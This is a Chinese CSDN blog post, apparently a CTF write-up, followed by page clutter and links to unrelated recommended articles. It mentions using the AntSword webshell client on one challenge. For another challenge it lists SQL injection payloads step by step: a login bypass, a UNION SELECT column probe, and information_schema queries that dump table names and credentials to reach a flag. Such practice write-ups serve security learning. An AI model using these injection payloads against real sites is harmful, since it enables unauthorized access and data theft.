周报23/4/16

最新推荐文章于 2024-10-17 00:04:56 发布

安知君惜墨

最新推荐文章于 2024-10-17 00:04:56 发布

阅读量38

点赞数

文章标签： html 前端

本文链接：https://blog.csdn.net/dmtnb/article/details/130179894

版权

打开题目得到

明显是可以直接利用蚁剑的

得到

简单的到文件flag

点开得到题目，直接使用万能密码

1' or 1=1#

得到

成功登录，然后查看一下url,发现是以get方式进行传参。可以先在username处测试一下有没有注入点：

?username=1' order by 1%23&password=ads

直到order by 4的时候，报错了：

看来有三个字段，开始寻找注入点：

?username=1' union select 1,2,3%23&password=ads

很明显，2和3都是注入点，而且没有过滤，接下来直接写命令了。

?username=1' union select 1,database(),3%23&password=ads

得到数据库名：geek！

?username=1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=ads

得到表名geekuser,l0ve1ysq1

?username=1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=ads

得到字段名id,username,password

?username=1' union select 1,database(),group_concat(id,username,password) from l0ve1ysq1%23&password=ads

得到flag为：flag{be266ac1-ee01-4910-8cb5-6a4462220676}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

安知君惜墨

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

Java周报

x4132的博客

10-24

1357

Day01：一、内部类(inner class) 1、定义在一个类中，定义另一个类的代码结构，通常定义在类内部的类称为 “内部类” ，外面的类称为“外部类” ，在逻辑关系上内部类与外部类是从属关系，比如一个People类存在收货地址类（收货人，收货联系方式） 2、分类 2.1、普通内部类（inner class），一个类A中定义另一个类B，其中类B就是类A的内部类，也是类A的一部分 public class People {

企业-房地产行业第16周周报（4月17日_4月23日）_：高能级城市成交持续增长；土地溢价率显著下滑.rar

09-15

这篇企业-房地产行业第16周周报（4月17日_4月23日）聚焦了中国房地产市场的最新动态，主要关注了高能级城市的交易情况以及土地市场的变化。高能级城市通常指的是经济发达、人口密集的一线和新一线城市，如北京、上海...

参与评论您还未登录，请先登录后发表或查看评论

RatingDapp 数据周报 (2019/4/21 ~ 4/27)

RatingDapp的博客

04-28

158

Dapp交易回暖本周Dapp交易额除ETH持平外，TRON和EOS皆呈现上涨趋势。TRON交易额周环比上涨81%，来到8962万美元。交易榜常客TRONbet本周上涨103%，后起之秀TronWoW更是上涨191%，加上新上线就攻占第三名的Dragon Castle，前三名的Dapp就贡献了28.9亿TRX的交易流水，竞猜Dapp对于TRON的生态依旧占有重要影响力。EOS Dapp整体增...

2022.10.23 学习周报

peaunt1的博客

10-23

518

CNN

程序员java周报

weixin_29645033的博客

08-15

如何实现“程序员Java周报” 在现代软件开发中，定期生成周报是一个良好的实践，可以帮助团队了解进度、存在的问题和下一步计划。本文将指导你如何实现一个简单的“程序员Java周报”系统。以下是整个流程的步骤概述：步骤描述 1 确定所需的功能和数据 2 设计数据结构 3 实现数据收集模块 4 编写...

创新实训周报2024.6.16

u010649319的博客

06-24

689

实体链接的目标是识别文本中的实体提及（mention）并将其链接到知识库中的相应实体。双编码器分别编码文本和实体，生成嵌入向量，然后通过向量检索来找到与文本嵌入向量最接近的实体嵌入向量，从而生成候选实体。在第二阶段，BLINK 使用交互式编码器模型对第一阶段生成的候选实体进行排序，选择最可能的实体。：使用内积或余弦相似度计算mention嵌入向量与实体嵌入向量之间的相似度，检索出前k个最相似的实体作为候选实体。：根据相似度得分对候选实体进行排序，选择得分最高的实体作为最终链接的实体。

创新实训周报2024.4.28

u010649319的博客

05-31

1602

UIE使用daccano进行数据标注，并提供了将daccano数据转化为训练数据格式的代码。

2024.6.23 机器学习周报

lijiaweitt的博客

06-22

1799

本文主要讨论PINN。本文简要介绍了监督学习。其次本文展示了题为Physics-informed neural networks: A deep learning framework for solving forward and inverse problems involving nonlinear partial differential equations的论文主要内容。该论文提出了一个深度学习框架，使数学模型和数据能够协同结合。

Hibiscus的脑机接口学习周报（2022/12/26~2022/1/1）

SashiMoore的博客

01-01

717

脑电分析基础初学者的寒假第一周学习记录

RatingDapp 数据周报 (2019/3/24 ~ 3/30)

RatingDapp的博客

03-31

348

整体趋势本周由于CDP Portal与IDEX交易量的增长，带动整体ETH Dapp交易量较上周增长15%，到达3135万美元；EOS Dapp方面，整体交易量下滑23%，来到1.08亿美元，以往贡献较多交易流水的竞猜类Dapp如Endless Game、Dapp365等亦略显疲态；TRON Dapp部分本周整体交易额持平，来到1.16亿美元。 Dapp周交易金额周活跃用户方面，E...

20210426-方正证券-房地产行业第16周周报（4月17日~4月23日）_：高能级城市成交持续增长；土地溢价率显著下滑.pdf

04-26

周报总结了2021年4月17日至4月23日房地产行业的发展情况，重点分析了高能级城市房地产成交情况以及土地市场的溢价率变化。 2. 成交情况分析：报告指出，高能级城市新房和二手房成交量环比均有所下降，但同比上升。...

20210207-中信证券-全球科技行业产业周报（第142期）：谷歌2020Q4营收569亿美元，亚马逊2020Q4营收1256亿美元.pdf

04-08

### 全球科技行业产业周报核心知识点 #### 谷歌和亚马逊营收概况 - **谷歌2020Q4营收情况**：谷歌在2020年第四季度（Q4）实现了568.98亿美元的营收，同比上一年度增长了23%。其净利润达到152.27亿美元，同比增长43%...

20210423-广发证券-广发TTM估值比较周报（4月第4期）：一张图看懂本周A股估值变化.pdf

04-24

- **报告名称**：“20210423-广发证券-广发TTM估值比较周报（4月第4期）：一张图看懂本周A股估值变化” - **发布日期**：2021年4月23日 - **类型**：行业咨询报告 - **目的**：提供A股市场的最新估值变化分析，帮助...

新能源汽车产业链行业周报（6月第4周）：双积分修订稿发布，明确21-23年积分比例.pdf

07-03

根据本次“双积分修订稿”，明确提出了2021-2023年新能源汽车积分比例的要求，分别为14%、16%、18%。这一政策的发布，对新能源汽车产业链上的企业，尤其是新能源汽车制造企业，将产生重要影响。积分比例的逐年提升，...

1、HTML笔记

weixin_45871977的博客

10-16

515

前端学习笔记1-HTML笔记

《常见 HTML 标签和属性全解析》

一名资深Java工程师的技术分享

10-10

1204

在网页开发的世界里，HTML（超文本标记语言）就像是构建数字大厦的基石。它通过各种标签和属性来定义网页的结构、内容和样式。下面，让我们深入了解一些常见的 HTML 标签和属性。

HTML中子元素与父元素的text属性